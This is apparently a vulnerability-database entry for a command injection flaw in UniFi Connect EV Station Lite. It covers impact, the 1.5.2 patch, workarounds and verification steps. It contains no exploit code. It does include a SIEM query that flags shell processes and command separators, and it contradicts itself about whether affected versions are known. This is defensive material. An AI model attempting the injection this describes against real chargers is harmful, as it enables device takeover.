CVE-2025-24285
📋 TL;DR
This CVE describes command injection vulnerabilities in UniFi Connect EV Station Lite that allow attackers with network access to execute arbitrary commands on the device. The vulnerability affects all versions 1.5.1 and earlier of the EV charging station product. Successful exploitation could lead to complete system compromise.
💻 Affected Systems
- UniFi Connect EV Station Lite
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attacker to execute arbitrary commands, potentially gaining persistent access, disrupting charging operations, or using the device as a pivot point into the network.
Likely Case
Remote code execution allowing attacker to modify device configuration, disrupt charging services, or install malware for persistence.
If Mitigated
Limited impact if device is behind firewall with strict network segmentation and access controls.
🎯 Exploit Status
Vulnerability requires network access but no authentication. Command injection typically has low exploitation complexity.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.5.2 or later
Vendor Advisory: https://community.ui.com/releases/Security-Advisory-Bulletin-052-052/ac1251ee-5bb5-4cdf-8a71-68acd1775bb6
Restart Required: Yes
Instructions:
1. Log into UniFi Network application. 2. Navigate to Devices section. 3. Select affected EV Station Lite. 4. Click Update button. 5. Wait for device to download and install update. 6. Device will automatically restart.
🔧 Temporary Workarounds
Network Segmentation
allIsolate EV Station Lite on separate VLAN with strict firewall rules
Access Control
allRestrict network access to EV Station Lite using firewall rules
🧯 If You Can't Patch
- Isolate device on separate network segment with no internet access
- Implement strict firewall rules to limit access to only necessary management IPs
🔍 How to Verify
Check if Vulnerable:
Check device version in UniFi Network application under Devices > EV Station Lite > PropertiesCheck Version:
Check via UniFi Network application UI or SSH to device and run 'cat /etc/version'Verify Fix Applied:
Confirm device shows version 1.5.2 or later in UniFi Network application📡 Detection & Monitoring
Log Indicators:
- Unusual command execution in system logs
- Unexpected process creation
- Failed authentication attempts to device management
Network Indicators:
- Unusual outbound connections from EV Station
- Unexpected network traffic patterns
- Connection attempts to known malicious IPs
SIEM Query:
source="ev-station-logs" AND (process="bash" OR process="sh" OR cmd="*;*" OR cmd="*|*")